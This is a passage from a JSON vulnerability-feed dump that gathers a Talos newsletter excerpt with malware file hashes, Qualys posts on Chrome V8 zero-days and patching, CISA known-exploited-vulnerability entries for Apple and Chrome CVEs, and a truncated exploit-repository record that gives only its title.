to execute code with kernel privileges. Apple initially patched the issue in current iPhones and other devices and followed up a few days later with fixes for older hardware like the iPhone 8. This was the third instance of Apple patching a zero-day vulnerability since the start of the year. ([SC Media](<https://www.scmagazine.com/news/device-security/apple-patches-two-new-zero-days-targeting-iphones-ipads-macs>), [Security Week](<http://securityweek.com/apple-rolls-out-zero-day-patches-to-older-ios-macos-devices/>))\n\n**The FBI warned users again this week against plugging their phones in public charging stations** at common spaces like airports, hotels and shopping centers. The agency stated that threat actors have found ways to use the public USB ports to &quot;introduce malware and monitoring software onto devices.&quot; Instead, the Federal Communications Commission suggests users carry their own USB cables and charging blocks to plug directly into outlets rather than relying on or trusting a cable. However, the tweet from the FBI&#x27;s Denver office did not offer examples of any recent attacks that would have prompted a fresh warning. ([Axios](<https://www.axios.com/2023/04/10/fbi-warning-charging-stations-juice-jacking>), [NBC News](<https://www.nbcnews.com/business/consumer/fbi-warns-using-public-phone-charging-stations-rcna78998>))\n\n## Can&#x27;t get enough Talos?\n\n * [How threat actors are using AI and other modern tools to enhance their phishing attempts](<https://blog.talosintelligence.com/ai-and-other-modern-tools-enhance-phishing/>)\n * [How do you hunt cybersecurity threats in a war zone? Like this](<https://www.theregister.com/2023/04/07/talos_threat_hunting_ukraine/>)\n * [Cisco unveils latest security trends from Cisco Talos report at GISEC 2023](<https://www.intelligentcio.com/me/2023/03/14/cisco-unveils-latest-security-trends-from-cisco-talos-report-at-gisec-2023/>)\n * [Researcher Spotlight: Giannis Tziakouris first learned how to fix his family&#x27;s PC, and now he&#x27;s fixing networks all over the globe](<https://blog.talosintelligence.com/researcher-spotlight-giannis-tziakouris/>)\n\n## Upcoming events where you can find Talos\n\n**[RSA](<https://www.rsaconference.com/usa>) (April 24 - 27)**\n\nSan Francisco, CA\n\n**[Cisco Talos Incident Response: On Air](<https://www.linkedin.com/events/7049146334452355072/about/>) (April 27)**\n\nVirtual\n\n**[Cisco Live U.S.](<https://www.ciscolive.com/global.html?zid=pp>) (June 4 - 8)**\n\nLas Vegas, NV\n\n## Most prevalent malware files from Talos telemetry over the past week\n\n \n**SHA 256:** [9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507](<https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details>) \n**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f \n**Typical Filename:** VID001.exe \n**Claimed Product:** N/A \n**Detection Name:** Win.Worm.Coinminer::1201\n\n**SHA 256:** [e248b01e3ccde76b4d8e8077d4fcb4d0b70e5200bf4e738b45a0bd28fbc2cae6](<https://www.virustotal.com/gui/file/e248b01e3ccde76b4d8e8077d4fcb4d0b70e5200bf4e738b45a0bd28fbc2cae6/details>) \n**MD5:** 1e2a99ae43d6365148d412b5dfee0e1c \n**Typical Filename:** PDFpower.exe \n**Claimed Product:** PdfPower \n**Detection Name:** Win32.Adware.Generic.SSO.TALOS\n\n**SHA 256:** [f3d5815e844319d78da574e2ec5cd0b9dd0712347622f1122f1cb821bb421f8f](<https://www.virustotal.com/gui/file/f3d5815e844319d78da574e2ec5cd0b9dd0712347622f1122f1cb821bb421f8f/details>) \n**MD5:** a2d60b5c01a305af1ac76c95e12fdf4a \n**Typical Filename:** KMSAuto.exe \n**Claimed Product:** N/A \n**Detection Name:** W32.File.MalParent\n\n**SHA 256:** [e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>) \n**MD5:** 93fefc3e88ffb78abb36365fa5cf857c \n**Typical Filename:** Wextract \n**Claimed Product:** Internet Explorer \n**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg\n\n**SHA 256:** [00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725](<https://www.virustotal.com/gui/file/00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725/details>) \n**MD5:** d47fa115154927113b05bd3c8a308201 \n**Typical Filename:** mssqlsrv.exe \n**Claimed Product:** N/A \n**Detection Name:** Trojan.GenericKD.65065311", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-13T18:00:40", "type": "talosblog", "title": "Threat Source newsletter (April 13, 2023) \u2014 Dark web forum whac-a-mole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-37969", "CVE-2023-28205", "CVE-2023-28206", "CVE-2023-28252"], "modified": "2023-04-13T18:00:40", "id": "TALOSBLOG:0590B57B0EE82F183D901AD4C42EB516", "href": "https://blog.talosintelligence.com/threat-source-newsletter-april-13-2023/", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2022-12-14T08:08:58", "description": "Google has released yet another security update for the Chrome desktop web browser to address a high-severity vulnerability that is being exploited in the wild. This is the ninth Chrome zero-day fixed this year by Google. This security bug ([CVE-2022-4262](<https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html>); _QID 377804_) is a Type Confusion vulnerability in Chrome\u2019s V8 JavaScript Engine.\n\nGoogle has withheld details about the vulnerability to prevent expanding its malicious exploitation and to allow users time to apply the security updates necessary on their Chrome installations.\n\nGoogle\u2019s previous zero-days were also released right before a weekend (see [Don\u2019t spend another weekend patching Chrome](<https://blog.qualys.com/product-tech/2022/10/28/chrome-zero-day-cve-2022-3723>) and [Don\u2019t Spend Your Holiday Season Patching Chrome](<https://blog.qualys.com/product-tech/patch-management/2022/11/29/dont-spend-your-holiday-season-patching-chrome>)).\n\n\n\n## Organizations respond, but slowly\n\nAnalyzing anonymized data from the Qualys data lake, the Qualys Threat Research Unit found for Chrome zero-day vulnerabilities introduced between February and August, more than 90% of these instances were remediated. However, it took 11-21 days to remediate via the Chrome patch. With the frequency of vulnerabilities released in this widely used browser and the fact that browsers, by their nature, are more exposed to external attacks, reducing the MTTR for those Chrome vulnerabilities is critical.\n\n2022 Chrome Zero-Day Vulnerabilities, MTTR\n\nOf the nine Chrome zero-day threats this year, five were introduced just before the weekend on a Thursday or Friday. Organizations that don&#x27;t leverage automated patching must spend the weekend or holiday working on the manual, lengthy process of detecting vulnerable devices, preparing the Chrome patch, testing it, and deploying it to affected assets.\n\nCVE| Release Date| Day of the Week| Vulnerability Remediation Rate \n---|---|---|--- \nCVE-2022-0609| 2/14/2022| Monday| 94% \nCVE-2022-1096| 3/25/2022| **Friday**| 94% \nCVE-2022-1364| 4/14/2022| **Thursday**| 93% \nCVE-2022-2294| 7/4/2022| Monday| 93% \nCVE-2022-2856| 8/16/2022| Tuesday| 91% \nCVE-2022-3075| 9/2/2022| **Friday**| 85% \nCVE-2022-3723| 10/27/2022| **Thursday**| 65% \nCVE-2022-4135| 11/24/2022| **Thursday (Thanksgiving)**| 52% \nCVE-2022-4262| 12/2/2022| **Friday**| NA \n2022 Chrome Zero-Day vulnerability release dates and percentage of remediation\n\n## Qualys Patch Management speeds remediation\n\nThe Qualys Threat Research Unit has found on average critical vulnerabilities are weaponized in 15.9 days. Significantly reducing MTTR shortens the exposure window and improves an organization&#x27;s risk posture.\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) with Zero-Touch Patching allows organizations to use their Qualys Cloud Agent for vulnerability management and to deploy third-party application patches, including Chrome. If the Qualys Cloud Agent is installed on an asset, customers can patch it, regardless of any other deployed patch solution. By defining a simple zero-touch policy, assets can automatically deploy patches when the vendor releases a new one. If testing patches like Chrome is required before production deployment, automatically setup a zero-touch policy to deploy to a set of test devices before deploying the same tested patches to production devices.\n\nIf you are a Qualys customer without Patch Management, a [trial](<https://www.qualys.com/apps/patch-management/>) can be enabled quickly, leveraging the same agent used with VMDR. This allows you to immediately deploy the Chrome patch to your environment and create those automation jobs to ensure that the next time Google or any other vendor releases a patch, your assets are automatically updated.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-12-03T05:24:27", "type": "qualysblog", "title": "The 9th Google Chrome Zero-Day Threat this Year \u2013 Again Just Before the Weekend", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075", "CVE-2022-3723", "CVE-2022-4135", "CVE-2022-4262"], "modified": "2022-12-03T05:24:27", "id": "QUALYSBLOG:058E013CF475F33D6DEBB8955340D15B", "href": "https://blog.qualys.com/category/product-tech/patch-management", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-02T20:29:49", "description": "As we head into the weekend, Google has released an emergency security update for the Chrome desktop web browser to address a high-severity vulnerability known to be exploited in the wild. This is the seventh Chrome zero-day fixed this year by Google. This security bug ([CVE-2022-3723](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html?m=1>); **_QID 377721_**) is a type-confusion flaw in the Chrome V8 JavaScript engine.\n\n\n\nGoogle has not shared details on the nature of attacks in which this vulnerability is exploited but mentioned they are aware of reports that an exploit for this vulnerability exists in the wild.\n\nThe vulnerability is a \u201ctype confusion\u201d that affects the V8 component of Chrome. Typically, when a piece of code does not verify the type of object given to it and uses it blindly without type-checking, it leads to type confusion.\n\nType confusion can be extremely dangerous; sometimes, this can lead to code execution. By accessing memory regions that should not be accessible from the context of the application, an attacker could read sensitive information of other apps or cause crashes.\n\nAttacks on the V8 component of Chrome are not typical but are among the most dangerous. Google does not define the level of activity concerning the exploitation that exists in the wild, so whether attacks using [CVE-2022-3723](<https://www.cve.org/CVERecord?id=CVE-2022-3723>) are across-the-board or limited is unknown now.\n\n## Zero Day and Third-Party Applications\n\nZero-day attacks in third-party business applications are a preferred and easy way for threat actors to find their way into your organization. As such, ensuring all end users\u2019 desktops and laptops are patched \u2013 as soon as the zero-day fix is released is a critical task for every security and IT person.\n\nHowever, too many organizations struggle to remediate third-party application vulnerabilities expeditiously and oftentimes, rely on the application\u2019s auto-update mechanism. Unfortunately, auto-update may or may not work in a timely manner, and enforcement and tracking is challenging.\n\n## Respond Faster with Zero Touch\n\nIt is highly recommended to treat desktop and laptop patching differently than server and production patching. In most cases, the risk of patching a desktop application and breaking core business functionality is lower than causing a severe impact in a production environment. As such applying smart automation to your third-party applications on desktops and laptops will allow organizations to respond faster to new zero-day threats and do it all with little IT intervention or extra work. In other words, once the policy is created, everything else is Zero Touch.\n\n## Using Qualys and Zero-Touch Patching to Reduce Risk\n\nAs part of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>), Zero-Touch Patching intelligently identifies the riskiest products in the environment and helps create automation jobs to automatically deploy the proper patches and configuration changes required for remediating vulnerabilities.\n\nBased on Qualys patch prioritization report, applications are ranked based on the number of vulnerabilities they introduced to the environment. Common feedback we hear from our customers is that browsers, including Chrome, are in the top five (5) applications that introduced the most number of vulnerabilities, and therefore risk. Following the recommendation of this report, it is easy for customers to create automated, zero-touch patch jobs to automatically deploy patches to those top third-party applications. As Qualys supports patching these applications right out of the box, once those jobs are deployed, IT teams and security teams do not need any more time with remediation efforts every time a new patch is released. Aren&#x27;t you tired of being a weekend remediation warrior?\n\n**_Qualys Patch Management &gt; Prioritized Products &gt; Windows &gt; Chrome_**\n\nIf you are a Qualys customer that does not have Patch enabled, a [trial](<https://www.qualys.com/apps/patch-management/>) can be enabled quickly \u2013 it leverages the same VMDR agent - which will allow you to immediately deploy the Chrome patch to your environment and then create those automation jobs to ensure the next time Google or any other vendor releases a patch, your desktops and laptops are automatically updated.\n\n[Try Qualys Patch Management Today!](<https://www.qualys.com/apps/patch-management/>)\n\n## Contributors\n\n * Saeed Abbasi, Manager, Vulnerability Signatures, Qualys", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-28T22:07:37", "type": "qualysblog", "title": "Don\u2019t spend another weekend patching Chrome", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-28T22:07:37", "id": "QUALYSBLOG:2FF98A895C020ED1CE5E7F898BD6BA9A", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-28T20:49:22", "description": "As we head into the weekend, Google has released an emergency security update for the Chrome desktop web browser to address a high-severity vulnerability known to be exploited in the wild. This is the seventh Chrome zero-day fixed this year by Google. This security bug ([CVE-2022-3723](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html?m=1>); QID 377721) is a type-confusion flaw in the Chrome V8 JavaScript engine.\n\nGoogle has not shared details on the nature of attacks in which this vulnerability is exploited but mentioned they are aware of reports that an exploit for this vulnerability exists in the wild.\n\nThe vulnerability is a \u201ctype confusion\u201d that affects the V8 component of Chrome. Typically, when a piece of code does not verify the type of object given to it and uses it blindly without type-checking, it leads to type confusion.\n\nType confusion can be extremely dangerous; sometimes, this can lead to code execution. By accessing memory regions that should not be accessible from the context of the application, an attacker could read sensitive information of other apps or cause crashes.\n\nAttacks on the V8 component of Chrome are not typical but are among the most dangerous. Google does not define the level of activity concerning the exploitation that exists in the wild, so whether attacks using CVE-2022-3723 are across-the-board or limited is unknown now.\n\n## Zero Day and 3rd-party Applications\n\nZero-day attacks in 3rd-party business applications are a preferred and easy way for threat actors to find their way into your organization. As such, ensuring all end users\u2019 desktops and laptops are patched \u2013 as soon as the zero-day fix is released is a critical task for every security and IT person.\n\nHowever, too many organizations struggle to remediate 3rd-party application vulnerabilities expeditiously and oftentimes, rely on the application\u2019s auto-update mechanism. Unfortunately, auto-update may or may not work in a timely manner and enforcement and tracking is challenging.\n\n## Respond Faster with Zero Touch\n\nIt is highly recommended to treat desktop and laptop patching differently than server and production patching. In most cases, the risk of patching a desktop application and breaking core business functionality is lower than causing severe impact in a production environment. As such applying smart automation to your 3rd-party applications on desktops and laptops will allow organizations to respond faster to new zero-day threats and do it all with little IT intervention or extra work. In other words, once the policy is created, everything else is Zero Touch.\n\n## Using Qualys and Zero-Touch Patching to Reduce Risk\n\nAs part of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>), Zero-Touch Patching intelligently identifies the riskiest products in the environment and helps create automation jobs to automatically deploy the proper patches and configuration changes required for remediating vulnerabilities.\n\nBased on Qualys patch prioritization report, applications are ranked based on the number of vulnerabilities they introduced to the environment. Common feedback we hear from our customers is that browsers, including Chrome, are in the top 5 applications that introduced the most number of vulnerabilities, and therefore risk. Following the recommendation of this report, it is easy for customers to create automated, zero-touch patch jobs to automatically deploy patches to those top 3rd party applications. As Qualys supports patching these applications right out of the box, once those jobs are deployed, IT teams and security teams do not need any more time with remediation efforts every time a new patch is released. Aren&#x27;t you tired of being a weekend remediation warrior?\n\n\n\nIf you are a Qualys customer that does not have Patch enabled, a [trial](<https://www.qualys.com/apps/patch-management/>) can be enabled quickly \u2013 it leverages the same VMDR agent - which will allow you to immediately deploy the Chrome patch to your environment and then create those automation jobs to ensure the next time Google or any other vendor releases a patch, your desktops and laptops are automatically updated.", "cvss3": {}, "published": "2022-10-28T19:40:19", "type": "qualysblog", "title": "Chrome Zero Day \u2013 Just Before the Weekend (again)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-28T19:40:19", "id": "QUALYSBLOG:E44F97839C7555E7A3CA4C08F8074CFD", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-11-08T19:39:20", "description": "Apple iOS, iPadOS, and macOS IOSurfaceAccelerator contain an out-of-bounds write vulnerability that allows an app to execute code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T00:00:00", "type": "cisa_kev", "title": "Apple iOS, iPadOS, and macOS IOSurfaceAccelerator Out-of-Bounds Write Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-04-10T00:00:00", "id": "CISA-KEV-CVE-2023-28206", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:39:20", "description": "Apple iOS, iPadOS, macOS, and Safari WebKit contain a use-after-free vulnerability that leads to code execution when processing maliciously crafted web content.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T00:00:00", "type": "cisa_kev", "title": "Apple Multiple Products WebKit Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-10T00:00:00", "id": "CISA-KEV-CVE-2023-28205", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T19:39:43", "description": "Google Chromium V8 contains a type confusion vulnerability. Specific impacts from exploitation are not available at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-28T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-28T00:00:00", "id": "CISA-KEV-CVE-2022-3723", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-30T17:39:30", "description": "Google Chromium V8 contains a type confusion vulnerability. Specific impacts from exploitation are not available at this time.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-17T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-17T00:00:00", "id": "CISA-KEV-CVE-2023-2033", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T17:41:59", "description": "Google Chromium V8 engine contains a type confusion vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-04-15T00:00:00", "id": "CISA-KEV-CVE-2022-1364", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T19:39:43", "description": "Google Chromium V8 contains a type confusion vulnerability. Specific impacts from exploitation are not available at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-05T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T00:00:00", "id": "CISA-KEV-CVE-2022-4262", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T17:41:59", "description": "The vulnerability exists due to a type confusion error within the V8 component in Chromium, affecting all Chromium-based browsers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2022-1096", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-11-09T00:31:01", "description": "# AcceleratorTroll\u2122 <img src=\"acceleratortroll/Assets.xcassets/A...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-05-15T14:22:12", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Apple Ipados", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-09-08T02:23:04", "id": "6DF32471-44E1-5C04-BCD6-B675F00AFC08", "href": "", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-09T00:30:55", "description": "# 